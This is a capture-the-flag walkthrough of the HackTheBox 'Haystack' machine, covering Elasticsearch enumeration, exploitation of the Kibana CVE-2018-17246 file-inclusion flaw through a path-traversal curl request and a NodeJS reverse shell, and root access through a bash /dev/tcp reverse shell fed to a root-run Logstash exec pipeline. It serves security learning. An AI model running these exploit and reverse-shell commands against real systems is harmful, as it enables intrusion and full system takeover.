HackTheBox - Haystack
Haystack is a very interesting box to learn more about the ELK (Elasticsearch, Logstash, Kibana) stack which is becoming very popular. The user part is very CTF type while the root part is more realistic scenario.
First thing first, let’s add the box IP to the hosts file:
1 | [hg8@archbook ~]$ echo '10.10.10.115 haystack.htb' >> /etc/hosts |
User Flag
Recon
Let’s start with the classic nmap
scan:
1 | [hg8@archbook ~]$ nmap -sV -sT -sC 10.10.10.115 |
Alright nothing suprising here: SSH, HTTP and 9200 which is port used by Elasticsearch. Let’s start.
Stenography
Once opening http://haystack.htb we are greeted with a single image.
1 | <html><body><img src="needle.jpg" /></body></html> |
gobuster
doesn’t find anything else interresting. So let’s check this image :
1 | [hg8@archbook ~]$ wget haystack.htb/needle.jpg |
So far so good, nothing suspicious. Let’s see if we can find strings in it :
1 | [hg8@archbook ~]$ strings needle.jpg |
Let’s decode this base64 string :
1 | [hg8@archbook ~]$ echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d |
A hint. Let’s keep clave
in mind (key in Spanish). I think there is nothing else to find on the http service so let’s move on to the Elasticsearch instance.
Elasticsearch
Opening port 9200 return the following json:
1 | [hg8@archbook ~]$ http haystack.htb:9200 |
It’s a classic Elastic cluster. On version 6.4.2 (not the most recent one).
We can use the _cat
endpoint to list all indexes :
1 | [hg8@archbook ~]$ http "haystack.htb:9200/_cat/indices" |
So we have bank
with 1000 records and quotes
with 253 records. Let’s search across those documents to see if we can find something interesting with our previous hint in mind.
According the the documentation, we can use the _search
endpoint to search across all documents. Searching for the keyword key
doesn’t seem to return any interesting user or information. Let’s try with the clave
keyword we found in the image :
1 | [hg8@archbook ~]$ http "haystack.htb:9200/_search?q=clave" |
Neat, sounds promising. Let’s decode :
1 | [hg8@archbook ~]$ echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d |
An username and a password, couldn’t ask for anything better! Is that SSH credentials ?
1 | [hg8@archbook ~]$ ssh [email protected] |
First step done. Time for root.
Root flag
Now that we have user let’s try to elevate privilege. Privilege enumeration scripts output nothing really interresting so let’s focus on the ELK stack again which seems the core part of this box.
Pivot security -> kibana user
Kibana and Logstash are installed but configuration files are inaccesible to the security
user :
1 | [security@haystack conf.d]$ cat /etc/passwd |
Seems like we will need to pivot to Kibana
or Logstash
user to make progress.
For now we don’t have informations about neither Kibana nor Logstash. Let’s check Elasticsearch again :
1 | [hg8@archbook ~]$ http haystack.htb:9200 |
Elasticsearch is in version 6.4.2 for a build date of September 2018. That’s quite old.
And indeed after a bit of GoogleFu we stumbled upon CVE-2018-17246 :
Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
More informations are available on CyberArk website and gives us example on how to run this exploit.
First we need to write a NodeJS reserve shell (I used the one found here) to the /tmp/hg8.js
folder:
1 | (function(){ |
Start netcat
utility to listen for the reverse shell:
1 | nc -l -vv -p 8585 |
Let’s now launch the exploit on the local instance of Kibana.
According to the documentation Kibana runs on port 5601
:
The default settings configure Kibana to run on localhost:5601.
We now have every informations needed, let’s launch our exploit:
1 | curl "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../tmp/hg8.js" |
On our netcat
the connection appear :
1 | [hg8@archbook ~]$ nc -l -vv -p 8585 |
Good we are on Kibana user now.
Let’s upgrade our shell to a fully interactive one for easiest work (check out this blog post for more informations):
1 | $ python -c 'import pty;pty.spawn("/bin/bash")' |
Logstash -> root
Looking around show that /opt/kibana/
turn out to be empty, /etc/elasticsearch/
still can’t be accessed.
/etc/logstash/
belong to kibana
group so we can read the content. Let’s dig.
As a reminder Logstash is a tool that collect various logs, parses them, and writes the parsed data to an Elasticsearch cluster :
Logstash (part of the Elastic Stack) integrates data from any source, in any format with this flexible, open source collection, parsing, and enrichment pipeline.
https://www.elastic.co/fr/products/logstash
Once reading the startup.options
file, an information catch the eye :
1 | $ cat /etc/logstash/startup.options |
So Logstash will run not as logstash
user but as root
user. We are on the right track.
The conf.d
folder contains three files. According to its contents, here what each file do:
input.conf
tell Logstash where to search for logs.filter.conf
filter what data is treated and what is ignored.output.conf
define what to do with parsed data.
Let’s look first at input.conf
and output.conf
:
1 | $ cat input.conf |
According to this config Logstash will, every 10 seconds :
- Check for file named
logstash_*
in the/opt/kibana/
folder.
1 | path => "/opt/kibana/logstash_*" |
Check the file content for data matching filters (a regex) defined in
filter.conf
.Send the matched data to be executed in background :
1 | exec { |
Good, it seems we can write any command in a file named /opt/kibana/logstash_*
and it should be run as root. Neat.
But first we have to make sure the command match the filter to be parsed correctly by logstash.
Let’s understand that filter :
1 | $ cat filter.conf |
That’s a complicated syntax at first look. Logstash documentation present grok
as :
Grok is a great way to parse unstructured log data into something structured and queryable.
So it’s a kind of regex. Let’s understand it step by step :
Ejecutar\s*comando\s*:\s+
is a simple regex, meaning that the file have to begin with this sentence.%{GREEDYDATA:comando}
is the interresting grok part. According to the grok pattern source GREEDYDATA
correspond to a .*
in regex.
So basically, when given the following line : Ejecutar comando : id
grok will match the line and take the id
part and parse it as commando
variable to the Logstash output (command => "%{comando} &"
as seen in output.conf
).
Let’s put all those informations together and try to get a root shell.
First as usual let’s open a netcat
listener :
1 | nc -l -vv -p 4485 |
Then create the file Logstash will take as input (/opt/kibana/logstash_*
) with the correct content matching the filter.conf
.
1 | echo "bash -i >& /dev/tcp/10.10.10.10/4485 0>&1" > /opt/kibana/logstash_hg8 |
We then wait a bit and fairly quicky we get an incoming connection as root:
1 | nc -l -vv -p 4485 |
As always do not hesitate to contact me for any questions or feedbacks ;)
See you next time !
-hg8